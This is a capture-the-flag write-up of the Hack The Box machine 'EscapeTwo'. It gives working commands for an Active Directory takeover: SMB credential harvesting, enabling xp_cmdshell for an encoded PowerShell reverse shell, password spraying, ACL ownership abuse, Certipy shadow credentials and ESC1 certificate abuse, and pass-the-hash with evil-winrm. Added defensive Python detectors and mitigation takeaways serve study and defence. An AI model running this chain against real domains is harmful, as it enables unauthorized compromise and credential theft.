EscapeTwo AD

Summary

The initial access was straightforward, as the machine's description provided a username and password. Using these credentials, further enumeration was performed with crackmapexec to discover additional users. File shares were also checked for readable content, leading to an SMB share that contained an XLS file. Upon inspection, the file held credentials for other users.

The most interesting service was MSSQL, which was accessed with Impacket; command execution through it exposed configuration files that revealed another password. A password spray with crackmapexec identified the user that password belonged to.

For privilege escalation, the user Ryan held Active Directory Rights Overwrite privileges over the ca_svc account. By using them to take ownership of ca_svc and then running Certipy against that account, administrative access was obtained, leading to full system compromise.

Challenge Information

  • Name: EscapeTwo

  • Platform: Hack The Box (HTB)

  • Category: Active Directory (Windows)

  • Difficulty: Easy

  • Objective: Exploit Active Directory to retrieve the flag.

  • Tags: smbclient, evil-winrm, certipy

  • Key Exploit: Active Directory Rights Overwrite

Machine Information

  • IP Address: 10.10.11.51

  • Domain: sequel.htb

  • Domain Controller: DC01.sequel.htb

  • Initial Credentials: rose / KxEPkKe6R8su

Enumeration

nmap

A full port scan was conducted to identify open services.

nmap -sC -sV -p- 10.10.11.51

Discovered Open Ports & Services:

Port   Service    Description
53     DNS        Domain Name System
88     Kerberos   Authentication Service
135    RPC        Remote Procedure Call
139    NetBIOS    File Sharing Service
389    LDAP       Active Directory Queries
445    SMB        File Share Access
1433   MSSQL      Microsoft SQL Server 2019
5985   WinRM      Windows Remote Management

Key Findings:

  • The machine is part of an Active Directory domain: sequel.htb.

  • A Microsoft SQL Server 2019 instance is running.

  • SMB and LDAP are exposed, so shares and directory objects should be enumerated for leaked credentials.

Before proceeding with enumeration and exploitation, add the target machine’s IP and domain name to /etc/hosts for easier interaction with services.

echo "10.10.11.51 sequel.htb dc01.sequel.htb" | sudo tee -a /etc/hosts

Initial Access

The challenge description provided the initial credentials:

Username: rose
Password: KxEPkKe6R8su

Using NetExec (nxc, the maintained successor of crackmapexec), the shares readable by rose were listed:

nxc smb sequel.htb -u 'rose' -p 'KxEPkKe6R8su' --shares

SMB Enumeration

The Accounting Department SMB share contained an XLS file, which was retrieved and analyzed.

smbclient "//sequel.htb/Accounting Department" -U rose
smb: \> mget *

Extracting the contents of the XLS file revealed additional credentials:

angela : 0fwz7Q4mSpurIt99  
oscar : 86LxLBMgEWaKUnBG  
kevin : Md9Wlq1E5bZnVDVo  
sa : MSSQLP@ssw0rd!

Exploiting MSSQL for Shell Access

According to the MS documentation, xp_cmdshell spawns a Windows command shell and passes in a string for execution. Any output is returned as rows of text.

xp_cmdshell { 'command_string' } [ , NO_OUTPUT ]

Using impacket-mssqlclient, a connection was established using the extracted sa credentials.

impacket-mssqlclient sa:"password"@sequel.htb

Enabling xp_cmdshell

The xp_cmdshell feature was enabled to execute system commands.

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
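From the defender's side, the two sp_configure changes above leave a clear trace: SQL Server writes a "Configuration option ... changed from 0 to 1" line to its ERRORLOG for each one. The following Python is an added example (not part of the writeup) that scans ERRORLOG lines for that sequence; the log excerpt is constructed in the real ERRORLOG format and is not from the target machine.

```python
import re

# SQL Server writes one of these lines to ERRORLOG for every sp_configure change.
CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Options whose enablement (0 -> 1) hands a SQL login OS-level command execution.
DANGEROUS_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures"}

def find_enablements(lines):
    """Return (timestamp, spid, option) for each dangerous option turned on."""
    hits = []
    for line in lines:
        m = CONFIG_CHANGE.match(line)
        if not m:
            continue
        if m["option"] in DANGEROUS_OPTIONS and m["old"] == "0" and m["new"] == "1":
            hits.append((m["ts"], m["spid"], m["option"]))
    return hits

def sessions_with_sequence(lines):
    """spids that enabled 'show advanced options' and then a dangerous option,
    which is exactly the sequence used above to reach xp_cmdshell."""
    advanced = set()
    flagged = []
    for line in lines:
        m = CONFIG_CHANGE.match(line)
        if not m or m["new"] != "1":
            continue
        if m["option"] == "show advanced options":
            advanced.add(m["spid"])
        elif m["option"] in DANGEROUS_OPTIONS and m["spid"] in advanced:
            flagged.append(m["spid"])
    return flagged

# Constructed sample ERRORLOG excerpt (not taken from the target machine).
SAMPLE_LOG = """\
2025-01-12 10:04:58.10 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2025-01-12 10:05:03.12 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2025-01-12 10:06:11.40 spid52      Configuration option 'max server memory (MB)' changed from 2147483647 to 4096. Run the RECONFIGURE statement to install.
""".splitlines()

if __name__ == "__main__":
    for ts, spid, opt in find_enablements(SAMPLE_LOG):
        print(f"{ts} {spid}: '{opt}' enabled")
    print("sessions showing the full enable sequence:", sessions_with_sequence(SAMPLE_LOG))
```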

Gaining a Reverse Shell

A PowerShell reverse shell from Nishang was base64-encoded and launched through xp_cmdshell:

xp_cmdshell 'powershell -enc <<base64_payload>>'

This returned a shell as sequel\sql_svc. Further enumeration of the SQL2019 installation directory (SQL2019\ExpressAdv_ENU) turned up sql-configuration.ini, which contained a plaintext password.

Privilege Escalation – Active Directory Rights Overwrite

Identifying New Credentials

The password from sql-configuration.ini came without a matching username, so a password-spraying attack with crackmapexec was used to find the account it belonged to. The user list was built with net user /domain from the sql_svc shell and saved as all_users.txt:

crackmapexec smb sequel.htb -u all_users.txt -p 'WqSZAF6CysDQbGb3'

The only account that authenticated successfully was ryan.
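A spray like the one above produces a burst of failed logons (Event ID 4625) for many different accounts from one source, followed by a single success (4624) for the account whose password matched. The following Python is an added detection example, not part of the writeup; the events are constructed and reduced to the fields the logic needs (the source IP and account names are made up).

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Windows Security events (4625 = failed logon, 4624 = success),
# reduced to the fields a spray detection needs. Not real logs from the target.
EVENTS = [
    {"time": "2025-01-12T11:00:00", "id": 4625, "ip": "10.10.14.5", "user": "angela"},
    {"time": "2025-01-12T11:00:01", "id": 4625, "ip": "10.10.14.5", "user": "oscar"},
    {"time": "2025-01-12T11:00:01", "id": 4625, "ip": "10.10.14.5", "user": "kevin"},
    {"time": "2025-01-12T11:00:02", "id": 4625, "ip": "10.10.14.5", "user": "sql_svc"},
    {"time": "2025-01-12T11:00:02", "id": 4625, "ip": "10.10.14.5", "user": "ca_svc"},
    {"time": "2025-01-12T11:00:03", "id": 4624, "ip": "10.10.14.5", "user": "ryan"},
    {"time": "2025-01-12T11:30:00", "id": 4625, "ip": "10.10.14.9", "user": "kevin"},
    {"time": "2025-01-12T11:45:00", "id": 4625, "ip": "10.10.14.9", "user": "kevin"},
]

def detect_spray(events, window=timedelta(minutes=5), min_accounts=4):
    """Return {source_ip: sorted accounts} for sources whose failed logons hit
    at least min_accounts distinct accounts inside one sliding time window.
    One password across many users is the spray signature; one user failing
    repeatedly (10.10.14.9 above) is a brute force or a typo, not a spray."""
    failures = defaultdict(list)
    for e in events:
        if e["id"] == 4625:
            failures[e["ip"]].append((datetime.fromisoformat(e["time"]), e["user"]))
    sprayers = {}
    for ip, attempts in failures.items():
        attempts.sort()
        lo = 0
        for hi in range(len(attempts)):
            while attempts[hi][0] - attempts[lo][0] > window:
                lo += 1
            users = {u for _, u in attempts[lo:hi + 1]}
            if len(users) >= min_accounts and len(users) > len(sprayers.get(ip, [])):
                sprayers[ip] = sorted(users)
    return sprayers

def successes_from(events, sprayers):
    """Accounts that logged on successfully from a spraying source: these are
    the ones whose password matched and the first to reset."""
    return sorted({e["user"] for e in events if e["id"] == 4624 and e["ip"] in sprayers})

if __name__ == "__main__":
    hits = detect_spray(EVENTS)
    print("spray sources:", hits)
    print("compromised accounts:", successes_from(EVENTS, hits))
```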

Identifying Privileges

Using PowerView, Ryan’s privileges were examined:

Get-DomainUser -Identity ryan -Properties objectsid
Get-DomainObjectAcl -ResolveGUIDs -SecurityIdentifier S-1-5-21-548670397-972687484-3496335370-1114

The ACL showed that Ryan held Active Directory Rights Overwrite privileges over the ca_svc account, meaning he could change the owner of that object and, from there, take full control of it.

Assigning Ryan as Owner

Ryan was made the owner of the ca_svc account and then granted full control over it:

Set-DomainObjectOwner -TargetIdentity ca_svc -PrincipalIdentity ryan
Add-DomainObjectAcl -TargetIdentity ca_svc -PrincipalIdentity ryan -Rights All

Certificate-Based Authentication (Certipy)

With full control over ca_svc, Certipy's shadow credentials attack was run as ryan to obtain ca_svc's NT hash and a Kerberos ticket cache:

certipy-ad shadow auto -u ryan@sequel.htb -p 'WqSZAF6CysDQbGb3' -dc-ip 10.10.11.51 -ns 10.10.11.51 -target dc01.sequel.htb -account ca_svc

The first attempt failed with a Kerberos clock skew error (Kerberos rejects requests when the client and DC clocks differ by more than the default five minutes). Once it succeeded, Certipy printed ca_svc's NT hash and saved a ticket cache, ca_svc.ccache, which was then used to look for vulnerable certificate templates and to reconfigure the DunderMifflinAuthentication template:

KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad find -scheme ldap -k -debug -target dc01.sequel.htb -dc-ip 10.10.11.51 -vulnerable -stdout
KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad template -k -template DunderMifflinAuthentication -target dc01.sequel.htb -dc-ip 10.10.11.51
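The template command above rewrites DunderMifflinAuthentication so that an enrollee may supply the subject, the certificate is usable for client authentication, and no approval is required, which is the ESC1 pattern the next step exploits. The Python below is an added audit check, not part of the writeup and not Certipy's code: it takes a template's attributes as a plain dict (the attribute names and bit values are the real AD CS ones; the two sample templates are constructed to resemble the page's template before and after it was weakened) and reports whether every ESC1 condition holds.

```python
# Real AD CS bit values (msPKI-Certificate-Name-Flag / msPKI-Enrollment-Flag) and EKU OIDs.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
CT_FLAG_SUBJECT_ALT_REQUIRE_UPN = 0x02000000
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # CA manager approval required
AUTH_EKUS = {"1.3.6.1.5.5.7.3.2",     # Client Authentication
             "1.3.6.1.5.2.3.4",       # PKINIT Client Authentication
             "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
             "2.5.29.37.0"}           # Any Purpose
PRIVILEGED = {"Domain Admins", "Enterprise Admins"}

def esc1_findings(t):
    """List the conditions that together make template t abusable in the ESC1
    pattern (requester picks the UPN, cert works for logon, no approval gate,
    no co-signature, low-privilege principals may enroll). Empty list = not ESC1."""
    conds = []
    if t["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        conds.append("requester supplies the subject/UPN")
    if (set(t["ekus"]) & AUTH_EKUS) or not t["ekus"]:  # no EKU at all also allows logon
        conds.append("usable for client authentication")
    if not t["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        conds.append("no CA manager approval")
    if t["ra_signatures"] == 0:
        conds.append("no authorized signatures required")
    low = sorted(p for p in t["enroll_principals"] if p not in PRIVILEGED)
    if low:
        conds.append("enrollable by " + ", ".join(low))
    return conds if len(conds) == 5 else []

# Constructed samples: the template as a sane baseline and after being weakened.
SAFE = {"name": "DunderMifflinAuthentication",
        "name_flag": CT_FLAG_SUBJECT_ALT_REQUIRE_UPN,   # CA builds the UPN from AD
        "ekus": ["1.3.6.1.5.5.7.3.2"], "enrollment_flag": 0, "ra_signatures": 0,
        "enroll_principals": ["Domain Users"]}
WEAKENED = {"name": "DunderMifflinAuthentication",
            "name_flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
            "ekus": ["1.3.6.1.5.5.7.3.2"], "enrollment_flag": 0, "ra_signatures": 0,
            "enroll_principals": ["Domain Users", "Domain Admins"]}

if __name__ == "__main__":
    for tpl in (SAFE, WEAKENED):
        print(tpl["name"], "->", esc1_findings(tpl) or "no ESC1 finding")
```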

Requesting a Certificate for Administrator Access

certipy-ad req -u ca_svc -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -ca sequel-DC01-CA -target sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn administrator@sequel.htb -ns 10.10.11.51 -dns 10.10.11.51 -debug


Authenticating as Administrator

certipy-ad auth -pfx ./administrator_10.pfx -dc-ip 10.10.11.51

Certipy authenticates with the certificate and prints the administrator's NT hash, which is then used for the login.

Using Evil-WinRM, administrator access was established:

evil-winrm -i dc01.sequel.htb -u administrator -H {admin_hash}


Conclusion

This machine demonstrated the importance of securing Active Directory Certificate Services (ADCS) and MSSQL xp_cmdshell. Key takeaways:

  1. Avoid embedding plaintext credentials in files.

  2. Restrict SMB access to authenticated and authorized users.

  3. Disable unnecessary SQL Server features like xp_cmdshell.

  4. Monitor Active Directory rights assignments, especially over critical accounts.

This was an engaging Active Directory exploitation challenge that emphasized SMB enumeration, password spraying, SQL abuse, and AD certificate misconfigurations.
